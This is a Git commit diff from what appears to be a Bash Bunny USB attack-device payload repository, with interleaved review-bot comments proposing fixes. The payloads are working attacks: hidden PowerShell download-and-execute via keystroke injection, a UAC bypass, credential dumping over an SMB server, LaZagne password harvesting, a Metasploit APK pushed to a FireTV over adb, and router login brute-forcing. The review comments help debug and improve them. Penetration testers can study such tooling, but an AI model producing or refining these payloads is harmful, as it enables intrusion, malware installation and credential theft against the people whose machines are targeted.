Update and fix payloads (#277)

* Updated all Payloads for Version 1.2+

Fixed Style Issues on extensions and payloads.
Added GET TARGET_OS to get.sh
Removed and fixed all uses of ducky_helper.sh (Issue #248)
Removed all mention of DUCKY_LANG (Issue #248)
Renamed Payloads with spaces in name
Added an extension to keep Macs Happy
Added a payload for Mac DNS poisoning
Fixed Issue #271 changed wget to curl -o
Implemented PR #268
Implemented PR #273

* Fixed e.cmd

* Fix e.cmd pt2

* Fixed Issues

Fixed issues pointed out by @sebkinne
Fixed styling errors
Aidan Holland 2017-10-24 20:10:17 -04:00 committed by Sebastian Kinne
parent c0ab8d3e88
commit 5a77792c1d
56 changed files with 438 additions and 395 deletions


@ -1,25 +1,25 @@
#!/bin/bash
function CUCUMBER() {
case $1 in
"ENABLE")
echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
echo 0 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
;;
"DISABLE")
echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
sleep 2
echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
;;
"PLAID")
echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
sleep 2
echo performance | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
;;
*)
LED FAIL
exit 1
esac
case $1 in
"ENABLE")
echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
echo 0 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
;;
"DISABLE")
echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
sleep 2
echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
;;
"PLAID")
echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
sleep 2
echo performance | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
;;
*)
LED FAIL
exit 1
esac
}
export -f CUCUMBER
export -f CUCUMBER


@ -1,8 +1,8 @@
#!/bin/bash
function DUCKY_LANG() {
[[ -z "$1" ]] && exit 1 # parameter must be set
[[ -z "$1" ]] && exit 1 # parameter must be set
export DUCKY_LANG="$1"
export DUCKY_LANG="$1"
}
export -f DUCKY_LANG


@ -1,23 +1,31 @@
#!/bin/bash
function GET() {
case $1 in
"TARGET_IP")
export TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
;;
"TARGET_HOSTNAME")
export TARGET_HOSTNAME=$(cat /var/lib/dhcp/dhcpd.leases | grep hostname | awk '{print $2 }' | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//')
;;
"HOST_IP")
export HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'})
;;
"SWITCH_POSITION")
[[ "$(cat /sys/class/gpio_sw/PA8/data)" == "0" ]] && export SWITCH_POSITION="switch1" && return
[[ "$(cat /sys/class/gpio_sw/PL4/data)" == "0" ]] && export SWITCH_POSITION="switch2" && return
[[ "$(cat /sys/class/gpio_sw/PL3/data)" == "0" ]] && export SWITCH_POSITION="switch3" && return
export SWITCH_POSITION="invalid"
;;
esac
case $1 in
"TARGET_IP")
export TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
;;
"TARGET_HOSTNAME")
export TARGET_HOSTNAME=$(cat /var/lib/dhcp/dhcpd.leases | grep hostname | awk '{print $2 }' | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//')
;;
"HOST_IP")
export HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'})
;;
"SWITCH_POSITION")
[[ "$(cat /sys/class/gpio_sw/PA8/data)" == "0" ]] && export SWITCH_POSITION="switch1" && return
[[ "$(cat /sys/class/gpio_sw/PL4/data)" == "0" ]] && export SWITCH_POSITION="switch2" && return
[[ "$(cat /sys/class/gpio_sw/PL3/data)" == "0" ]] && export SWITCH_POSITION="switch3" && return
export SWITCH_POSITION="invalid"
;;
"TARGET_OS")
ScanForOS=$(nmap -Pn -O $TARGET_IP -p1)
[[ $ScanForOS == *"Too many fingerprints"* ]] && ScanForOS=$(nmap -Pn -O --osscan-guess $TARGET_IP)
[[ $ScanForOS == *"Windows"* ]] && OSfound='WINDOWS' && return
[[ $ScanForOS == *"Linux"* ]] && OSfound='LINUX' && return
[[ $ScanForOS == *"Apple"* ]] && OSfound='MACOS' && return
export TARGET_OS='UNKNOWN'
;;
esac
}
export -f GET
export -f GET
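Review bot: The new `TARGET_OS` branch never exports a detected OS: the three match lines assign `OSfound='WINDOWS'`/`'LINUX'`/`'MACOS'` and `return`, so a caller of `GET TARGET_OS` only ever sees `TARGET_OS` when it is `UNKNOWN`. Each of those lines should read like `[[ $ScanForOS == *"Windows"* ]] && export TARGET_OS='WINDOWS' && return` (likewise for LINUX and MACOS), and `OSfound` can go. Nothing in the branch guards against `TARGET_IP` being unset or holding several addresses (the `TARGET_IP` branch's `sort | uniq` can yield more than one), so a `[[ -z "${TARGET_IP}" ]] && { export TARGET_OS='UNKNOWN'; return; }` before the scan and quoting `"$TARGET_IP"` would avoid an nmap run against nothing or against a mangled argument list.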


@ -0,0 +1,26 @@
#!/bin/bash
#Title: Mac_Happy
# Author: thehappydinoa
# Target: Mac
# Version: 0.1
#
# Makes Mac happy by correctly setting pid and vid
# Use by running mac_happy ATTACKMODE HID <attack modes here>
#
function mac_happy() {
[[ -z "$1" ]] && exit 1 # parameter must be set
[[ ! $1 =~ "ATTACKMODE" ]] && exit 1 # parameter must be for ATTACKMODE
for i in $*;
do
command=$(echo $command $i)
done
command=$(echo $command VID_0X05AC PID_0X021E)
eval $command
}
export -f mac_happy
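Review bot: The body rebuilds the argument list as a string and hands it to `eval $command`, which re-parses the words and also prepends whatever value `command` already had in the environment, since the variable is neither `local` nor initialised. The function can call the arguments directly: `[[ "$1" == "ATTACKMODE" ]] || exit 1` followed by `"$@" VID_0X05AC PID_0X021E`, which keeps every word intact and removes the `for i in $*` loop and the `eval`. Note that `[[ ! $1 =~ "ATTACKMODE" ]]` with a quoted right-hand side is a substring match, not a regex, so the equality test above is the intended check. The `#Title:` header line also lacks the space after `#` that the other header lines use.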


@ -8,11 +8,11 @@
# REQUIRETOOL impacket
function REQUIRETOOL() {
[[ -z "$1" ]] && exit 1 # parameter must be set
[[ -z "$1" ]] && exit 1 # parameter must be set
if [ ! -d /tools/$1/ ]; then
LED FAIL
exit 1
fi
if [ ! -d /tools/$1/ ]; then
LED FAIL
exit 1
fi
}
export -f REQUIRETOOL


@ -13,9 +13,9 @@
function RUN() {
local os=$1
shift
[[ -z "$os" || -z "$*" ]] && exit 1 # Both OS and Command parameter must be set
case "$os" in
WIN)
QUACK GUI r
@ -37,6 +37,13 @@ function RUN() {
QUACK DELAY 500
QUACK ENTER
;;
LINUX)
QUACK ALT F2
QUACK DELAY 500
QUACK STRING "$@"
QUACK DELAY 500
QUACK ENTER
;;
*)
# OS parameter must be one of the above
exit 1
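Review bot: The new `LINUX)` arm relies on `QUACK ALT F2` opening a run dialog, which holds for some desktop environments and not others; a one-line comment above it, `# assumes a desktop whose ALT+F2 opens a run dialog; no effect elsewhere`, would save the next reader from assuming it is generic. Also, the `*)` fallback exits without signalling, whereas the other extensions on this page (CUCUMBER, REQUIRETOOL) emit `LED FAIL` before `exit 1`; adding `LED FAIL` above that `exit 1` keeps the failure visible. The function's closing lines are outside the hunk.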


@ -7,45 +7,45 @@
# Examples:
# SETKB START (set the keyboard layout to a US keyboard layout)
# SETKB DONE (set the keyboard layout to the default keyboard determined by the OS language settings)
# SETKB xx-XX (overwrite the keyboard layout to whatever keyboard layout you need, you will need the [lanugage].json file to run Ducky scripts)
# SETKB xx-XX (overwrite the keyboard layout to whatever keyboard layout you need, you will need the [lanugage].json file to run Ducky scripts)
function SETKB() {
local state=$1
shift
[[ -z "$state" ]] && exit 1 # state keyboard parameter must be given.
case "$state" in
'START')
QUACK GUI r
QUACK DELAY 500
QUACK STRING "powershell.exe Set-WinUserLanguageList -LanguageList en-US -force;"
QUACK ENTER
QUACK DELAY 1500
local state=$1
shift
;;
'DONE')
QUACK GUI r
QUACK DELAY 500
QUACK "STRING powershell.exe \$sl=(Get-WinSystemLocale | Select -ExpandProperty Name) ; Set-WinUserLanguageList -LanguageList \$sl -force; "
QUACK ENTER
QUACK DELAY 1500
[[ -z "$state" ]] && exit 1 # state keyboard parameter must be given.
;;
*)
QUACK GUI r
QUACK DELAY 500
QUACK "STRING powershell.exe Set-WinUserLanguageList -LanguageList $state -force"
QUACK ENTER
QUACK DELAY 1500
case "$state" in
'START')
QUACK GUI r
QUACK DELAY 500
QUACK STRING "powershell.exe Set-WinUserLanguageList -LanguageList en-US -force;"
QUACK ENTER
QUACK DELAY 1500
;;
;;
'DONE')
QUACK GUI r
QUACK DELAY 500
QUACK "STRING powershell.exe \$sl=(Get-WinSystemLocale | Select -ExpandProperty Name) ; Set-WinUserLanguageList -LanguageList \$sl -force; "
QUACK ENTER
QUACK DELAY 1500
;;
*)
QUACK GUI r
QUACK DELAY 500
QUACK "STRING powershell.exe Set-WinUserLanguageList -LanguageList $state -force"
QUACK ENTER
QUACK DELAY 1500
;;
esac
esac
}
export -f SETKB


@ -1,12 +1,7 @@
LED R B 100
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
DUCKY_LANG gb
LED B
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
LED G FAST
#Green means good to go
LED SETUP
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\run.ps1')"
LED ATTACK
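Review bot: `LED SETUP` is issued twice on the new side, once at the top and again immediately before the `RUN WIN powershell …` line, and the payload ends on `LED ATTACK` with no `LED FINISH`, while the other payloads in this commit finish with `LED FINISH` after their `RUN`/`QUACK` block. The second `LED SETUP` is presumably meant to be the attack indicator, so the tail would read `LED ATTACK` / `RUN WIN powershell …` / `LED FINISH`. The next file section (the seven-line new payload with the same `RUN WIN` line) has the same shape and needs the same reordering.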


@ -0,0 +1,7 @@
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
LED SETUP
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\run.ps1')"
LED ATTACk
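Review bot: The last line reads `LED ATTACk` with a lowercase `k`; every other use on this page is `LED ATTACK`, so this looks like a typo that will not match the intended LED pattern. Change it to `LED ATTACK` (and see the note on the previous section about the duplicated `LED SETUP` and missing `LED FINISH`, which applies here too).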


@ -11,8 +11,13 @@
# Blue Blinking ...............Running ADB command to push payload.apk
# Red Blinking.......FireTV failed to get an IP address from the Bash Bunny
# Green..............Finished
LED SETUP
GET TARGET_IP
GET SWITCH_POSITION
ATTACKMODE HID
LED R B 0
LED ATTACK
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
@ -64,12 +69,11 @@ Q DELAY 200
Q ESCAPE
ATTACKMODE ECM_ETHERNET
LED B 2000
source bunny_helpers.sh
if [ -z "${TARGET_IP}" ]; then
LED R 2000
LED FAIL
exit 1
fi
adb connect ${TARGET_IP}
adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk
adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity"
LED G
LED FINISH
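Review bot: `GET TARGET_IP` now runs during setup, before `ATTACKMODE HID`, but the GET extension in this commit reads the address from `/var/lib/dhcp/dhcpd.leases`, which cannot contain the target's lease until `ATTACKMODE ECM_ETHERNET` has been brought up and the target has obtained an address; at that early point `TARGET_IP` is empty (barring a stale lease), so the `if [ -z "${TARGET_IP}" ]` guard will trip on every run. The removed `source bunny_helpers.sh` sat exactly where the refresh is needed; put `GET TARGET_IP` in its place after `LED B 2000`, presumably with a short wait-and-retry until the lease appears. `adb connect ${TARGET_IP}` and the `adb install … ${SWITCH_POSITION} …` line should also quote their expansions.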


@ -5,15 +5,14 @@
# Version: 1.0
# Category: Password Recovery
# Target: Windows XP SP3+
#
#
# Description: Will attempt to bruteforce common router username/password combinations in an attempt to gain
# access to the admin panel.
# init
LED R B
LED SETUP
# need SWITCH_POSITION, so give it to me. please. thank you.
source bunny_helpers.sh
GET SWITCH_POSITION
# set up the things to make it do stuff
mkdir -p /root/udisk/BruteBunny/loot
@ -28,12 +27,12 @@ sync;sleep 1;sync
ATTACKMODE HID STORAGE
# wait for storage
LED R G B 100
LED STAGE1
QUACK DELAY 6000
QUACK GUI r
QUACK DELAY 100
# unleash the brute bunny
LED B 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\brutebunny.ps1')"
QUACK ENTER
sleep 10
@ -41,4 +40,4 @@ sleep 10
# sync the stuff
sync;sleep 1;sync
LED G
LED FINISH


@ -6,23 +6,23 @@
# Build: 1004
# Category: Exfiltration
# Target: Windows Windows 10 (Powershell)
# Attackmodes: HID, Ethernet
# Attackmodes: HID, Ethernet
# !!! works only with Bash Bunny FW 1.1 and up !!!
#
#
# LED Status
# ----------------------- + --------------------------------------------
# SETUP + Setup
#
#
# LED Status
# ----------------------- + --------------------------------------------
# SETUP + Setup
# FAIL + No /tools/impacket/examples/smbserver.py found
# FAIL2 + Target did not acquire IP address
# Yellow single blink + Initialization
# Yellow double blink + HID Stage
# Yellow triple blink + Wait for IP coming up
# Cyan inv single blink + Wait for Handshake (SMBServer Coming up)
# Cyan inv quint blink + Powershell scripts running
# White fast blink + Cleanup, copy Files to <root>/loot
# Green + Finished
# ----------------------- + --------------------------------------------
# FAIL2 + Target did not acquire IP address
# Yellow single blink + Initialization
# Yellow double blink + HID Stage
# Yellow triple blink + Wait for IP coming up
# Cyan inv single blink + Wait for Handshake (SMBServer Coming up)
# Cyan inv quint blink + Powershell scripts running
# White fast blink + Cleanup, copy Files to <root>/loot
# Green + Finished
# ----------------------- + --------------------------------------------
logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #############################"
@ -30,6 +30,7 @@ logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #
###### Lets Start ####
LED SETUP
GET SWITCH_POSITION
# Some Variables
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
@ -39,13 +40,13 @@ LOOTDIR=$SWITCHDIR/loot
if [ -f $SWITCHDIR/DEBUG ];then
DEBUG=1 # 1= Debug on / 0= Debug off
tail -f /var/log/syslog > /tmp/log.txt &
else
else
DEBUG=0
fi
mkdir -p $LOOTDIR
mkdir -p $LOOTDIR
REQUIRETOOL impacket
REQUIRETOOL impacket
# remove old Handshake Files
rm -f $SWITCHDIR/CON_*
@ -60,8 +61,8 @@ Q DELAY 5000
# Launch initial cmd
if [ $DEBUG -eq 1 ]; then
RUN WIN cmd
else
RUN WIN cmd
else
RUN WIN cmd /k mode con lines=1 cols=100
fi
@ -69,7 +70,7 @@ fi
Q DELAY 1000
if [ $DEBUG -eq 1 ]; then
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f'-Verb runAs"
else
else
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f /k mode con lines=1 cols=100' -Verb runAs"
fi
Q DELAY 500
@ -77,12 +78,12 @@ Q ENTER
# Bypass UAC :: Change "ALT j" and "ALT n" according to your language i.e. for us it is ALT o (OK) and ALT c (cancel)
# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline
# now the second powershell command goes to the admin cmd windows.
# With no Adminrights the the credentils prompt opens. ALT j doesn't do anything because there are no credentials. Then ALT n cancels the credentials propmpt.
# the second powershell command goes to the cmd Windows I open first.
# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline
# now the second powershell command goes to the admin cmd windows.
# With no Adminrights the the credentils prompt opens. ALT j doesn't do anything because there are no credentials. Then ALT n cancels the credentials propmpt.
# the second powershell command goes to the cmd Windows I open first.
Q DELAY 1000
Q ALT j
Q DELAY 500
@ -109,7 +110,6 @@ logger -t DumpCred_2.1 "### Enter Ethernet Stage ###"
# Ethernet Tage
LED STAGE3
ATTACKMODE RNDIS_ETHERNET
# Source bunny_helpers.sh to get environment variables
logger -t DumpCred_2.1 "### Start SMBServer ###"
# Start SMB Server
@ -149,7 +149,7 @@ logger -t DumpCred_2.1 "### cleanup and copy files ###"
if ! [ -d /root/udisk/loot/DumpCred_2.1 ]; then
mkdir -p /root/udisk/loot/DumpCred_2.1
fi
mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1
mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1
rmdir $LOOTDIR
rm -f $SWITCHDIR/CON_EOF
@ -163,4 +163,4 @@ fi
ATTACKMODE RNDIS_ETHERNET STORAGE
sync; sleep 1; sync
LED FINISH
LED FINISH
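Review bot: Dropping the `# Source bunny_helpers.sh to get environment variables` comment after `ATTACKMODE RNDIS_ETHERNET` leaves nothing in the Ethernet stage that refreshes the target's address; the LED legend at the top still lists `FAIL2 + Target did not acquire IP address`, so if the check behind it reads `TARGET_IP` (it is outside these hunks, so this is inferred), that stage now needs a `GET TARGET_IP` after `ATTACKMODE RNDIS_ETHERNET`. Separately, `GET SWITCH_POSITION` can leave `SWITCH_POSITION=invalid` (see the GET extension in this commit), and `SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION` is then used unguarded by `rm -f $SWITCHDIR/CON_*` and `mkdir -p $LOOTDIR`; a `[[ "$SWITCH_POSITION" == invalid ]] && { LED FAIL; exit 1; }` right after the GET would stop early.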


@ -14,7 +14,10 @@
# Cyan inverted double blink..Starts server to gets results
# Green..............Got Creds and copied to loot folder
# Red................No Creds
LED SETUP
GET SWITCH_POSITION
# Creating Loot Folders
LOOTDIR=/root/udisk/loot/MrRobot
mkdir -p $LOOTDIR
@ -34,7 +37,7 @@ Q DELAY 500
Q ENTER
Q DELAY 1500
LED STAGE2
LED STAGE2
#Powershell Payload: first wait for connection to bunny webserver, then pull scripts and upload results
Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1');exit}}\""
Q DELAY 300


@ -11,7 +11,7 @@ REM This executes LaZagne in the current directory and outputs the password file
REM Time and Date is also added
setlocal
cd /d %~dp0
%~dp0\laZagne.exe all > "%~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"
%~dp0\laZagne.exe all -vV > "%~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"
REM These lines if you just want Passwords and no files.
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%


@ -6,12 +6,13 @@
# Target: Windows XP SP3+
# Props: Diggster, IMcPwn
# Category: Exfiltration
#
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn executes and if stated, copies documents to the loot folder on the Bash Bunny.
#
LED SETUP
GET SWITCH_POSITION
LED ATTACK
ATTACKMODE HID STORAGE
RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
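Review bot: The payload ends at the `RUN WIN powershell …` line without a `LED FINISH`, unlike the other payloads updated in this commit that close with `LED FINISH` after their `RUN`/`QUACK ENTER`; append `LED FINISH` so the end state is signalled. The later e.cmd payload section with the identical `RUN WIN powershell …` line has the same gap and, in addition, calls `GET SWITCH_POSITION` without the `LED SETUP` that precedes it here. The description line `which in turn executes and if stated, copies documents` reads awkwardly and could say `which in turn runs e.cmd and, if configured, copies documents`.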


@ -24,8 +24,6 @@ else
ATTACKMODE ECM_ETHERNET HID
fi
DUCKY_LANG us
GET SWITCH_POSITION
GET HOST_IP


@ -26,8 +26,6 @@ else
ATTACKMODE ECM_ETHERNET HID
fi
DUCKY_LANG us
GET SWITCH_POSITION
GET HOST_IP


@ -22,17 +22,15 @@
ATTACKMODE HID STORAGE
LED R B 200
LED SETUP
LANGUAGE=us
source bunny_helpers.sh
GET SWITCH_POSITION
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
QUACK ${SWITCH_POSITION}/ducky_script.txt
LED G
LED FINISH
else
LED R
LED FAIL
echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
exit 1
fi


@ -2,21 +2,24 @@
# Author: Skiddie
# Version: 1.1
# Target: Windows
#
#
# Download and executes any binary executable with administrator privileges WITHOUT
# prompting the user for administrator rights (aka UAC bypass/exploit)
# Please define URL and SAVEFILENAME in the a.vbs script
# Please define URL and SAVEFILENAME in the a.vbs script
# Target does need internet connection
# Works on Windows 7 - Windows 10
# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges
# However from what i am aware version 7,8 and 8.1 are still effected
# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges
# However from what i am aware version 7,8 and 8.1 are still effected
# Currently fastest download and execute for HID attacks to date. (with UAC bypass)
#Define your bunny storage stick name
DRIVER_LABEL='BashBunny'
#RED means starting
LED R
LED SETUP
#Gets File locations
GET SWITCH_POSITION
#We are a keyboard
ATTACKMODE HID STORAGE
@ -32,4 +35,3 @@ LED G
#If you would like to bash bunny to shutdown/exit/dismount from the target system after execution, you can uncomment the lines below
#QUACK DELAY 4500
#shutdown 0


@ -8,51 +8,49 @@
# Attackmodes: HID, RNDIS_ETHERNET
# Firmware: >= 1.3
#
# Quick HID attack to retrieve and run powershell payload from BashBunny web server - ensure psh.txt exists in payload directory
#
# Quick HID attack to retrieve and run powershell payload from BashBunny web server
# ensure p.txt (your powershell payload) exists in payload directory
#
# | Attack Stage | Description |
# | ------------------- | ---------------------------------------- |
# | Stage 1 | Running Initial Powershell Commands |
# | Stage 3 | Delivering powershell payload |
# | Stage 2 | Delivering powershell payload |
#
ATTACKMODE RNDIS_ETHERNET HID
LED SETUP
REQUIRETOOL gohttp
GET HOST_IP
GET SWITCH_POSITION
# Set working dir
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
SERVER_LOG=$PAYLOAD_DIR/server.log
# DEFINE DIRECTORIES
PAYLOAD_DIR=/root/udisk/payloads/${SWITCH_POSITION}
SERVER_LOG=/tmp/server.log
# Fresh Server Log
rm -f $SERVER_LOG
# SERVER LOG
rm -f ${SERVER_LOG}
# Check for gohttp
REQUIRETOOL gohttp
# Start web server
# START HTTP SERVER
iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately
/usr/bin/gohttp -p 80 -d $PAYLOAD_DIR > $SERVER_LOG 2>&1 &
/tools/gohttp/gohttp -p 80 -d /tmp/ > ${SERVER_LOG} 2>&1 &
# Check for psh.txt
if [ ! -f $PAYLOAD_DIR/psh.txt ]; then
# CHECK FOR POWERSHELL
if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then
LED FAIL2
exit 1
fi
cp -R ${PAYLOAD_DIR}/* /tmp/ # any additional assets will be available in tmp
# Attack HID
# STAGE 1 - POWERSHELL
LED STAGE1
# Attack (abbreviations to allow run execution)
RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('$HOST_IP','80')).Connected) {iex \$web.DownloadString('http://$HOST_IP/psh.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\""
RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('${HOST_IP}','80')).Connected) {iex \$web.DownloadString('http://${HOST_IP}/p.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\""
# Remove tracks in the psh payload if you wish
# Attack Ethernet
# STAGE 2 - WAIT
LED STAGE2
while ! grep -Fq "GET \"/DONE\"" $SERVER_LOG; do
while ! grep -Fq "GET \"/DONE\"" ${SERVER_LOG}; do
sleep .5
done
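Review bot: The new `gohttp -p 80 -d /tmp/` serves the whole of `/tmp`, and it is started before the `p.txt` check and before `cp -R ${PAYLOAD_DIR}/* /tmp/` has put the assets there, while `SERVER_LOG=/tmp/server.log` now lives inside the served tree, so the request log itself is fetchable over HTTP and anything else in `/tmp` (for example another payload's leftovers) is exposed along with it. Serve a dedicated directory created with `mktemp -d`, copy the assets into it first, keep the log outside it, and only then start the server. The `DONE` beacon in the `RUN WIN` line still hard-codes `172.16.64.1` while the rest of that line uses `${HOST_IP}`; use `${HOST_IP}` there too for consistency.
```shell
# DEFINE DIRECTORIES
PAYLOAD_DIR=/root/udisk/payloads/${SWITCH_POSITION}
WEB_DIR=$(mktemp -d)           # served tree: only this payload's assets, not all of /tmp
SERVER_LOG=/tmp/server.log     # outside the served tree so it cannot be fetched
# … unchanged: rm -f ${SERVER_LOG}, REQUIRETOOL gohttp, p.txt check (LED FAIL2 / exit 1) …
cp -R "${PAYLOAD_DIR}"/* "${WEB_DIR}"/   # assets are in place before the server is reachable
# START HTTP SERVER
iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately
/tools/gohttp/gohttp -p 80 -d "${WEB_DIR}" > "${SERVER_LOG}" 2>&1 &
# … unchanged: LED STAGE1 / RUN WIN … / LED STAGE2 / wait loop …
```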


@ -14,7 +14,7 @@ Quick HID attack to retrieve and run powershell payload from BashBunny web serve
## Configuration
Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
## Requirements
@ -31,5 +31,5 @@ See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info
| Attack Stage | Description |
| ------------------- | ---------------------------------------- |
| Stage 1 | Running Initial Powershell Commands |
| Stage 3 | Delivering powershell payload |
```
| Stage 2 | Delivering powershell payload |
```


@ -1,3 +1,2 @@
New-Item $ENV:UserProfile\Desktop\SUCCESS -ItemType file
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue


@ -2,23 +2,23 @@
#
# Title: Powershell Download and Execute SMB
# Author: LowValueTarget
# Version: 1.2
# Version: 2.0
# Category: Powershell
# Target: Windows XP SP3+ (Powershell)
# Attackmodes: HID, RNDIS_ETHERNET
# Firmware: >= 1.2
#
# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot.
# Ensure psh.txt exists in payload directory
# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Possibilities are limitless!
# Credentials captured by are stored as loot.
# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures)
#
# Requires Impacket is installed (python ./impacket/setup.py install)
# Required tools: impacket
#
# | Attack Stage | Description |
# | ------------------- | ------------------------------|
# | Stage 1 | Powershell |
# | Stage 2 | Delivering powershell payload |
#
ATTACKMODE RNDIS_ETHERNET HID
# SETUP
@ -29,48 +29,48 @@ GET SWITCH_POSITION
GET TARGET_HOSTNAME
GET HOST_IP
# DEFINE DIRECTORIES
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
# Check for psh.txt
if [ ! -f ${PAYLOAD_DIR}/psh.txt ]; then
LOOTDIR_BB=/root/udisk/loot/psh_DownloadExecSMB
mkdir -p /tmp/{l,p}
# CHECK FOR POWERSHELL
if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then
LED FAIL
exit 1
fi
cp -R ${PAYLOAD_DIR}/* /tmp/
cp -R ${PAYLOAD_DIR}/* /tmp/p/ # any additional assets will be available in tmp
LOOTDIR=/root/udisk/loot/psh_DownloadExecSMB
# Setup named logs in loot directory
mkdir -p ${LOOTDIR}
# GET HOSTNAME
HOST=${TARGET_HOSTNAME}
# If hostname is blank set it to "noname"
[[ -z "$HOST" ]] && HOST="noname"
COUNT=$(ls -lad ${LOOTDIR}/$HOST* | wc -l)
[[ -z "${HOST}" ]] && HOST="noname"
COUNT=$(ls -lad ${LOOTDIR_BB}/${HOST}* | wc -l)
COUNT=$((COUNT+1))
mkdir -p ${LOOTDIR}/${HOST}-$COUNT
mkdir -p ${LOOTDIR_BB}/${HOST}-${COUNT}
LOOTDIR_BB=${LOOTDIR_BB}/${HOST}-${COUNT}
# Log file
LOGFILE=psh_smb.log
# START SMB SERVER
LOGFILE=/tmp/l/psh_downloadsmb.log
touch ${LOGFILE}
python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp > ${LOGFILE} &
# Start SMB Server
mkdir -p /loot
python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp/ > /loot/${LOGFILE} &
# STAGE 1 - Powershell
# STAGE 1 - POWERSHELL
LED STAGE1
